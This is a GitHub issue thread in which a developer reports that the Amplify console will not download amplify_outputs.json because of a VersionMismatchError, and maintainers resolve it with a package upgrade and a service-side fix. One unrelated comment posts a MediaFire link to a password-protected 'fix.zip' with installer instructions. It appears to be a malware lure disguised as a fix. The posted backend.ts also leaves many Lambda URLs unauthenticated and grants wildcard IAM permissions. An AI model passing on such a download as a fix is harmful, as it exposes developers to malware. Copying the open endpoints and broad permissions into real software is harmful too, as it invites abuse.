### ISSUE TITLE
amplify_outputs.json is not downloading in the console

### ISSUE THREAD

**Issue by carlos-naranjo-aa** [aws-amplify/amplify-backend#1923] opened 2024-08-27 15:36 UTC
### Environment information

```plain text
System:
  OS: Windows 10 10.0.19045
  CPU: (32) x64 Intel(R) Xeon(R) CPU E5-2670 0 @ 2.60GHz
  Memory: 84.20 GB / 127.93 GB
Binaries:
  Node: 20.15.1 - C:\Program Files\nodejs\node.EXE      
  Yarn: 1.22.22 - ~\AppData\Roaming\npm\yarn.CMD        
  npm: 10.8.1 - C:\Program Files\nodejs\npm.CMD
  pnpm: undefined - undefined
NPM Packages:
  @aws-amplify/auth-construct: 1.1.4
  @aws-amplify/backend: 1.0.3
  @aws-amplify/backend-auth: 1.0.2
  @aws-amplify/backend-cli: 1.2.1
  @aws-amplify/backend-data: 1.0.2
  @aws-amplify/backend-deployer: 1.0.2
  @aws-amplify/backend-function: 1.0.3
  @aws-amplify/backend-output-schemas: 1.1.0
  @aws-amplify/backend-output-storage: 1.0.1
  @aws-amplify/backend-secret: 1.0.0
  @aws-amplify/backend-storage: 1.0.3
  @aws-amplify/cli-core: 1.1.1
  @aws-amplify/client-config: 1.1.1
  @aws-amplify/deployed-backend-client: 1.1.0
  @aws-amplify/form-generator: 1.0.0
  @aws-amplify/model-generator: 1.0.2
  @aws-amplify/platform-core: 1.0.3
  @aws-amplify/plugin-types: 1.1.0
  @aws-amplify/sandbox: 1.1.1
  @aws-amplify/schema-generator: 1.2.0
  aws-amplify: 6.4.3
  aws-cdk: 2.145.0
  aws-cdk-lib: 2.145.0
  typescript: 5.4.5
AWS environment variables:
  AWS_NODEJS_CONNECTION_REUSE_ENABLED = 1
  AWS_SDK_LOAD_CONFIG = 1
  AWS_STS_REGIONAL_ENDPOINTS = regional
No CDK environment variables
```

### Description

I f i try to deploy or redeploy the app, after it finishes it won't allow me to download the amplify_outputs.json i click the download amplify_outputs.json button and it won't do anything
That was working yesterday. I try to redeploy the repository branch in another app and also in another region both in the US and India and it did not worked
I read that i fix was deployed for someone about the same time the feature quit working. Not sure it is related but in any case the ticket was closed 4 hours ago

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 15:55
Ok, i tried the following:  i create a new app using the same repository but an earlier branch which i knowit use to work and it did not so it is nothing in the repository i guess

**Comment by Jay2113** [comment] 2024-08-27 15:55
Hi @carlos-naranjo-aa 👋 , thanks for raising this! Are you observing any errors in the browser's developer console when you try to download the outputs file?

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 16:00
> Hi @carlos-naranjo-aa 👋 , thanks for raising this! Are you observing any errors in the browser's developer console when you try to download the outputs file?

Let me see please

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 16:04
it showed this 

"unified_client_config_generator.js:75 Uncaught (in promise) VersionMismatchError: Conflicting versions of client configuration found. 
    at I.generateClientConfig (unified_client_config_generator.js:75:27)Caused by: Error: Version mismatch: Cannot accumulate new objects with version 1 with existing accumulated object with version 1.1
    at object_accumulator.js:69:27
    at index.js:927:11
    at le (index.js:1193:11)
    at me (index.js:920:3)
    at Pe (index.js:1912:3)
    at index.js:1170:9
    at index.js:136:25
    at index.js:1406:12
    at t.ObjectAccumulator.accumulate (object_accumulator.js:63:32)
    at I.generateClientConfig (unified_client_config_generator.js:64:29)"
the moment i press the button for download asmplify_outputs.json

**Comment by c0ffincolors** [comment] 2024-08-27 16:04
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ioanabrooks** [comment] 2024-08-27 16:20
@carlos-naranjo-aa Hi, are you using a custom backend configuration and specifying a version via `backend.addOutput`?

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 16:27
> @carlos-naranjo-aa Hi, are you using a custom backend configuration and specifying a version via `backend.addOutput`?

I don't think so because i use the stock configuration. I follow gen 2 docs and grew from there. Again i create an app and i use an old branch which i know it worked and it happened the same. It is not me for sure

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 16:43
here is my backend.ts

import { defineBackend } from '@aws-amplify/backend';
import { auth } from './auth/resource';
import { data } from './data/resource';
import { storage } from './storage/resource';
import { stripeWebhook } from './functions/stripe-webhook/resource';
import { FunctionUrlAuthType } from 'aws-cdk-lib/aws-lambda';
import { sendRaffleEmail } from './functions/send-mail/resource';
import { create_session } from './functions/stripe/create-session/resource';
import { session_status } from './functions/stripe/session-status/resource';
import { create_account } from './functions/stripe/create-account/resource';
import { create_account_link } from './functions/stripe/create-account-link/resource';
import { update_event_state } from './functions/raffle-events/update-event-state/resource';
import { consume_schedule_event } from './functions/raffle-events/event-consumer-lambda/resource';
import { schedule_update_event } from './functions/raffle-events/schedule-event-update/resource';
import { event_data } from './functions/raffle-events/event-dashboard/resource';
import { initiate_refund } from './functions/stripe/initiate-refund/resource';
import { drawnRaffle } from './functions/draw_raffle/resource';

import { TicketIndexIncrementHandler } from './data/resource';

import * as iam from "aws-cdk-lib/aws-iam"

const backend = defineBackend({
  auth,
  data,
  storage,
  stripeWebhook,
  sendRaffleEmail,
  create_session,
  session_status,
  create_account,
  create_account_link,
  TicketIndexIncrementHandler,
  update_event_state,
  consume_schedule_event,
  schedule_update_event,
  event_data,
  initiate_refund,
  drawnRaffle,
});

const sendemailurl = backend.sendRaffleEmail.resources.lambda.addFunctionUrl({authType:FunctionUrlAuthType.NONE});
const funcURL = backend.stripeWebhook.resources.lambda.addFunctionUrl({authType:FunctionUrlAuthType.NONE});
const createSession = backend.create_session.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const sessionStatusUrl = backend.session_status.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const createAccountUrl = backend.create_account.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const createAccountLinkUrl = backend.create_account_link.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const updateEventStateUrl = backend.update_event_state.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const scheduleUpdateEventUrl = backend.schedule_update_event.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const eventDataUrl = backend.event_data.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });
const initiateRefundUrl = backend.initiate_refund.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });

const drawnRaffleUrl = backend.drawnRaffle.resources.lambda.addFunctionUrl({ authType: FunctionUrlAuthType.NONE });



const consumeLambdaEventArn = backend.consume_schedule_event.resources.lambda.functionArn;

const statement = new iam.PolicyStatement({
  actions: ["sns:Publish"],
  resources: ["*"],
});

backend.stripeWebhook.resources.lambda.addToRolePolicy(statement);

const dynamoDBStatement = new iam.PolicyStatement({
  actions: ["dynamodb:CreateItem", "dynamodb:UpdateItem", "dynamodb:GetItem", "dynamodb:PutItem", "dynamodb:Query"],
  resources: ["*"],
});

backend.TicketIndexIncrementHandler.resources.lambda.addToRolePolicy(dynamoDBStatement);

const schedulerStatement = new iam.PolicyStatement({
  actions: ["scheduler:CreateSchedule", "scheduler:DeleteSchedule", "iam:PassRole"],
  resources: ["*"],
});

backend.schedule_update_event.resources.lambda.addToRolePolicy(schedulerStatement);

backend.addOutput({
  custom:{
    stripeWebhookUrl:funcURL.url,
    sendRaffleEmailUrl:sendemailurl.url,
    createSessionUrl: createSession.url,
    sessionStatusUrl: sessionStatusUrl.url,
    createAccountUrl: createAccountUrl.url,
    createAccountLinkUrl: createAccountLinkUrl.url,
    updateEventState: updateEventStateUrl.url,
    scheduleUpdateEvent: scheduleUpdateEventUrl.url,
    consumeLambdaEventArn: consumeLambdaEventArn,
    eventDataUrl: eventDataUrl.url,
    initiateRefundUrl: initiateRefundUrl.url,
    drawnRaffleUrl: drawnRaffleUrl.url,
  },
});


const { cfnUserPool } = backend.auth.resources.cfnResources;
// update the schema property to add custom attributes
if (Array.isArray(cfnUserPool.schema)) {
  cfnUserPool.schema.push({
    name: 'group',
    attributeDataType: 'String',
    developerOnlyAttribute: false,
    mutable: true,
  });
}

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 16:53
this is the console output in firefox 
Uncaught (in promise) VersionMismatchError: Conflicting versions of client configuration found. 
    i amplify_error.js:36
    i amplify_user_error.js:23
    generateClientConfig unified_client_config_generator.js:75
    B generate_client_config.js:31
    e downloadConfig.ts:35
    f downloadConfig.ts:2
    E downloadConfig.ts:2
    j downloadConfig.ts:2
    Sw downloadConfig.ts:2
    a downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Fw downloadConfig.ts:27
    e downloadConfig.ts:58
    f downloadConfig.ts:2
    E downloadConfig.ts:2
    j downloadConfig.ts:2
    Sw downloadConfig.ts:2
    a downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Mw downloadConfig.ts:53
    onClick DownloadConfig.tsx:30
    React 11
Caused by: Error: Version mismatch: Cannot accumulate new objects with version 1 with existing accumulated object with version 1.1
    o object_accumulator.js:36
    accumulate object_accumulator.js:69
    Lodash 7
    accumulate object_accumulator.js:63
    generateClientConfig unified_client_config_generator.js:64
    B generate_client_config.js:31
    e downloadConfig.ts:35
    f downloadConfig.ts:2
    E downloadConfig.ts:2
    j downloadConfig.ts:2
    Sw downloadConfig.ts:2
    a downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Fw downloadConfig.ts:27
    e downloadConfig.ts:58
    f downloadConfig.ts:2
    E downloadConfig.ts:2
    j downloadConfig.ts:2
    Sw downloadConfig.ts:2
    a downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Mw downloadConfig.ts:53
    onClick DownloadConfig.tsx:30
    React 11
[amplify_error.js:36:8](webpack://amzn/node_modules/@aws-amplify/platform-core/lib/errors/amplify_error.js)
    Sw downloadConfig.ts:2
    u downloadConfig.ts:2
    (Async: promise callback)
    Sw downloadConfig.ts:2
    a downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Ow downloadConfig.ts:2
    Mw downloadConfig.ts:53
    onClick DownloadConfig.tsx:30
    React 11

**Comment by ioanabrooks** [comment] 2024-08-27 16:56
@carlos-naranjo-aa Thank you for sharing, we are actively working on a fix. In the meantime as a workaround could you try to update the version of `@aws-amplify/backend` to latest?

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 17:29
I did an experiment, i create an app from the template for react and vite , deploy it and it did work. I am proceeding to update @aws-amplify/backend. Will let you guys know
Thanks

**Comment by carlos-naranjo-aa** [comment] 2024-08-27 19:27
I upgrade the @aws-amplify/backend and @aws-amplify/backend-cli and it did the trick. thanks for the tip

**Comment by Jay2113** [comment] 2024-08-28 11:28
@carlos-naranjo-aa we have deployed another fix which should mitigate this issue for existing apps. Please let us know if you continue to experience this issue.

**Comment by carlos-naranjo-aa** [comment] 2024-08-28 13:34
I have just deployed and i was able to download the amplify_outputs.json so we are good

**Comment by Jay2113** [comment] 2024-08-29 19:10
Thanks for the confirmation. I am going to close this thread since the issue is resolved.

**Closed by Jay2113** 2024-08-29 19:10 UTC
Labels: bug, console
